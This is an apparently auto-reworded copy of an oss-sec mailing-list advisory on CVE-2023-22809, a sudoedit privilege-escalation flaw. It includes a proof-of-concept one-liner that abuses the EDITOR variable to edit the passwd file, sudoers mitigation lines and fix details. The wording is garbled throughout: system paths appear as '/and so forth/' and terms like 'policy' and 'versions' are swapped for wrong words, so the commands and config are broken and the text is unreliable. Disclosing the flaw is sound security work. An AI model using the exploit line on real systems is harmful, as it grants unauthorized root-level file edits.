Now Reading
Sudoedit can edit arbitrary information

Sudoedit can edit arbitrary information

2023-01-19 15:05:26



oss-sec
mailing record archives






From: Matthieu Barjole <matthieu.barjole () synacktiv com>
Date: Thu, 19 Jan 2023 01:33:43 +0100



See Also

Hey everybody,

Whereas auditing Sudo, Synacktiv recognized a privilege escalation in sudoedit
when a person is permitted to make use of it by the sudoers coverage. This
vulnerability
was assigned CVE-2023-22809 and impacts Sudo variations 1.8.0 by means of 1.9.12p1
inclusive.

## Evaluation

The technical evaluation may be discovered within the following safety advisory:
https://www.synacktiv.com/sites/default/files/2023-01/sudo-CVE-2023-22809.pdf

## Proof of Idea

Assuming the next sudoers coverage:

```
# cat /and so forth/sudoers
person ALL=(ALL:ALL) sudoedit /and so forth/motd
[...]
```

Arbitrary information akin to `/and so forth/passwd` may be edited as such:

```
EDITOR='vim -- /and so forth/passwd' sudoedit /and so forth/motd
```

## Mitigation

It's potential to stop a user-specified editor from being utilized by
sudoedit by
including the next line to the sudoers file.

```
Defaults!sudoedit   env_delete+="SUDO_EDITOR VISUAL EDITOR"
```

To limit the editor when modifying particular information, a Cmnd_Alias may be
used,
for instance:

```
Cmnd_Alias          EDIT_MOTD = sudoedit /and so forth/motd
Defaults!EDIT_MOTD  env_delete+="SUDO_EDITOR VISUAL EDITOR"
person                ALL = EDIT_MOTD
```

## Repair

The problem was mounted in Sudo 1.9.12.p2.

## References

[1]
https://www.synacktiv.com/sites/default/files/2023-01/sudo-CVE-2023-22809.pdf
[2] https://www.sudo.ws/security/advisories/sudoedit_any/
[3] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22809







Present thread:

  • CVE-2023-22809: Sudoedit can edit arbitrary information Matthieu Barjole (Jan 18)



Source Link

What's Your Reaction?
Excited
0
Happy
0
In Love
0
Not Sure
0
Silly
0
View Comments (0)

Leave a Reply

Your email address will not be published.

2022 Blinking Robots.
WordPress by Doejo

Scroll To Top